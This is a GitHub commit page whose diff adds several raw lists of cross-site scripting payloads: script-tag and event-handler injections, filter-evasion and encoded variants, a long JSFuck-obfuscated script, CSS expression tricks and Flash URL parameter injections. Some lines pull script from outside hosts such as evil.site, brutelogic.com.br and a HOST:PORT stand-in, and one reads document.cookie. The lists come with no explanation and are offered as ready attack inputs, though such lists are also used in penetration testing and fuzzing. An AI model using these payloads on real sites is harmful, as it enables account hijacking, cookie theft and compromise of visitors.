Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
7 changed files
with
927 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,141 @@ | ||
<script>alert('1')</script> | ||
"><script>alert('1')</script> | ||
<svg/onload=alert('1'); | ||
"><svg/onload=alert('1'); | ||
<svg><script>alert('1')</script> | ||
"><svg><script>alert('1')</script> | ||
--!><script>alert('1')</script> | ||
<script src="http://prompt.ml/js/test.js"></script> | ||
"><script src="http://prompt.ml/js/test.js"></script> | ||
hello"type=image src onerror | ||
="alert(1) | ||
=[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕ | ||
javascript:alert(1) | ||
javascript:prompt(1) | ||
<svg/a=#"onload='/*#*/alert(1)' | ||
"><svg/a=#"onload='/*#*/alert(1)' | ||
'"><svg/onload=prompt(5);>{{7*7}} | ||
<noembed><p title="</noembed><img src=x onerror=alert(1)>"> | ||
<noscript><p title="</noscript><img src=x onerror=alert(1)>"> | ||
"><noembed><p title="</noembed><img src=x onerror=alert(1)>"> | ||
"><noscript><p title="</noscript><img src=x onerror=alert(1)>"> | ||
" onmouseover=alert(9205) bad=" | ||
"/>jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=prompt() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=prompt(123)//>\x3e | ||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e | ||
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)// | ||
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e | ||
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> | ||
'<script>alert(1)</script> | ||
<script>alert(1)</script> | ||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> | ||
<script> </script> | ||
<script>\u0061\u006C\u0065\u0072\u0074(123)</script> | ||
<script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script> | ||
<script>document.write('<img src=1 onerror=alert(1)>');</script> | ||
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | ||
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> | ||
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(1)//><img src=1 onerror=alert(1)>' | ||
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* | ||
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a | ||
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ | ||
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* | ||
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* | ||
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// | ||
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* | ||
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* | ||
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* | ||
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | ||
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | ||
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> | ||
<script>document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');</script> | ||
<script>document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');</script> | ||
<script>document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');</script> | ||
<div style="x:expression(alert(1))">Joker</div> | ||
<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">Joker</div> | ||
<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">Joker</div> | ||
<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">Joker</div> | ||
<iframe src="javascript:alert(1)"></iframe> | ||
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> | ||
<img src="1" onerror="alert(1)" /> | ||
<img src="1" onerror="alert(1)" /> | ||
<iframe src="javascript:alert(1)"></iframe> | ||
<script>document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');</script> | ||
<style>body{background-color:expression\(alert(1))}</style> | ||
javascript://--></title></style></textarea></script><svg "//' onclick=alert()// | ||
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* | ||
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></ | ||
'%22()%26%25<><ScRiPt%20>alert(1)</ScRiPt> | ||
' onmouseover=alert(9205) bad=' | ||
"><svg/onload=prompt(1)> | ||
"onresize=prompt(1)> | ||
<svg/onload=prompt(1) | ||
<svg><script>prompt(1)<b> | ||
<svg><script>prompt(1)</script> | ||
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | ||
<<scr\0ipt/src=http://xss.com/xss.js></script | ||
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E | ||
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> | ||
<img longdesc=”src=’x’onerror=alert(document.domain);//><img ” src=’showme’> | ||
<img longdesc=”src=” images=”” stop.png”=”” onerror=”alert(document.domain);//&quot;” src=”x” alt=”showme”> | ||
1′)}%0Aelse{%0Aalert(‘XSS’);(‘ | ||
%3c<aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e | ||
<img src=x:alert(alt) onerror=eval(src) alt='spyerror'> | ||
"></tag><svg onload=alert(spyerror)> | ||
[" <style> | ||
@KeyFrames | ||
|
||
z{</style><div style=animation-name:z onanimationend=alert`1`> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "] | ||
'; var pg = alert; pg(1);var a = ' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,110 @@ | ||
<svg onload=alert(1)> | ||
"><svg onload=alert(1)// | ||
"onmouseover=alert(1)// | ||
"autofocus/onfocus=alert(1)// | ||
'-alert(1)-' | ||
'-alert(1)// | ||
\'-alert(1)// | ||
</script><svg onload=alert(1)> | ||
<x contenteditable onblur=alert(1)>lose focus! | ||
<x onclick=alert(1)>click this! | ||
<x oncopy=alert(1)>copy this! | ||
<x oncontextmenu=alert(1)>right click this! | ||
<x oncut=alert(1)>copy this! | ||
<x ondblclick=alert(1)>double click this! | ||
<x ondrag=alert(1)>drag this! | ||
<x contenteditable onfocus=alert(1)>focus this! | ||
<x contenteditable oninput=alert(1)>input here! | ||
<x contenteditable onkeydown=alert(1)>press any key! | ||
<x contenteditable onkeypress=alert(1)>press any key! | ||
<x contenteditable onkeyup=alert(1)>press any key! | ||
<x onmousedown=alert(1)>click this! | ||
<x onmousemove=alert(1)>hover this! | ||
<x onmouseout=alert(1)>hover this! | ||
<x onmouseover=alert(1)>hover this! | ||
<x onmouseup=alert(1)>click this! | ||
<x contenteditable onpaste=alert(1)>paste here! | ||
<script>alert(1)// | ||
<script>alert(1)<!– | ||
<script src=//brutelogic.com.br/1.js> | ||
<script src=//3334957647/1> | ||
%3Cx onxxx=alert(1) | ||
<%78 onxxx=1 | ||
<x %6Fnxxx=1 | ||
<x o%6Exxx=1 | ||
<x on%78xx=1 | ||
<x onxxx%3D1 | ||
<X onxxx=1 | ||
<x OnXxx=1 | ||
<X OnXxx=1 | ||
<x onxxx=1 onxxx=1 | ||
<x/onxxx=1 | ||
<x%09onxxx=1 | ||
<x%0Aonxxx=1 | ||
<x%0Conxxx=1 | ||
<x%0Donxxx=1 | ||
<x%2Fonxxx=1 | ||
<x 1='1'onxxx=1 | ||
<x 1="1"onxxx=1 | ||
<x </onxxx=1 | ||
<x 1=">" onxxx=1 | ||
<http://onxxx%3D1/ | ||
<x onxxx=alert(1) 1=' | ||
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | ||
'onload=alert(1)><svg/1=' | ||
'>alert(1)</script><script/1=' | ||
*/alert(1)</script><script>/* | ||
*/alert(1)">'onload="/*<svg/1=' | ||
`-alert(1)">'onload="`<svg/1=' | ||
*/</script>'>alert(1)/*<script/1=' | ||
<script>alert(1)</script> | ||
<script src=javascript:alert(1)> | ||
<iframe src=javascript:alert(1)> | ||
<embed src=javascript:alert(1)> | ||
<a href=javascript:alert(1)>click | ||
<math><brute href=javascript:alert(1)>click | ||
<form action=javascript:alert(1)><input type=submit> | ||
<isindex action=javascript:alert(1) type=submit value=click> | ||
<form><button formaction=javascript:alert(1)>click | ||
<form><input formaction=javascript:alert(1) type=submit value=click> | ||
<form><input formaction=javascript:alert(1) type=image value=click> | ||
<form><input formaction=javascript:alert(1) type=image src=SOURCE> | ||
<isindex formaction=javascript:alert(1) type=submit value=click> | ||
<object data=javascript:alert(1)> | ||
<iframe srcdoc=<svg/onload=alert(1)>> | ||
<svg><script xlink:href=data:,alert(1) /> | ||
<math><brute xlink:href=javascript:alert(1)>click | ||
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | ||
<html ontouchstart=alert(1)> | ||
<html ontouchend=alert(1)> | ||
<html ontouchmove=alert(1)> | ||
<html ontouchcancel=alert(1)> | ||
<body onorientationchange=alert(1)> | ||
"><img src=1 onerror=alert(1)>.gif | ||
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | ||
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | ||
<script src="data:,alert(1)// | ||
"><script src=data:,alert(1)// | ||
<script src="//brutelogic.com.br/1.js# | ||
"><script src=//brutelogic.com.br/1.js# | ||
<link rel=import href="data:text/html,<script>alert(1)</script> | ||
"><link rel=import href=data:text/html,<script>alert(1)</script> | ||
<base href=//0> | ||
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | ||
<body onload=alert(1)> | ||
<body onpageshow=alert(1)> | ||
<body onfocus=alert(1)> | ||
<body onhashchange=alert(1)><a href=#x>click this!#x | ||
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | ||
<body onscroll=alert(1)><br><br><br><br> | ||
<body onresize=alert(1)>press F12! | ||
<body onhelp=alert(1)>press F1! (MSIE) | ||
<marquee onstart=alert(1)> | ||
<marquee loop=1 width=0 onfinish=alert(1)> | ||
<audio src onloadstart=alert(1)> | ||
<video onloadstart=alert(1)><source> | ||
<input autofocus onblur=alert(1)> | ||
<keygen autofocus onfocus=alert(1)> | ||
<form onsubmit=alert(1)><input type=submit> | ||
<select onchange=alert(1)><option>1<option>2 | ||
<menu id=x contextmenu=x onshow=alert(1)>right click me! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
|
||
#getURL,javascript:alert(1)", | ||
#goto,javascript:alert(1)", | ||
?javascript:alert(1)", | ||
?alert(1)", | ||
?getURL(javascript:alert(1))", | ||
?asfunction:getURL,javascript:alert(1)//", | ||
?getURL,javascript:alert(1)", | ||
?goto,javascript:alert(1)", | ||
?clickTAG=javascript:alert(1)", | ||
?url=javascript:alert(1)", | ||
?clickTAG=javascript:alert(1)&TargetAS=", | ||
?TargetAS=javascript:alert(1)", | ||
?skinName=asfunction:getURL,javascript:alert(1)//", | ||
?baseurl=asfunction:getURL,javascript:alert(1)//", | ||
?base=javascript:alert(0)", | ||
?onend=javascript:alert(1)//", | ||
?userDefined=');function someFunction(a){}alert(1)//", | ||
?URI=javascript:alert(1)", | ||
?callback=javascript:alert(1)", | ||
?getURLValue=javascript:alert(1)", | ||
?goto=javascript:alert(1)", | ||
?pg=javascript:alert(1)", | ||
?page=javascript:alert(1)" | ||
?playerready=alert(document.cookie) |
Oops, something went wrong.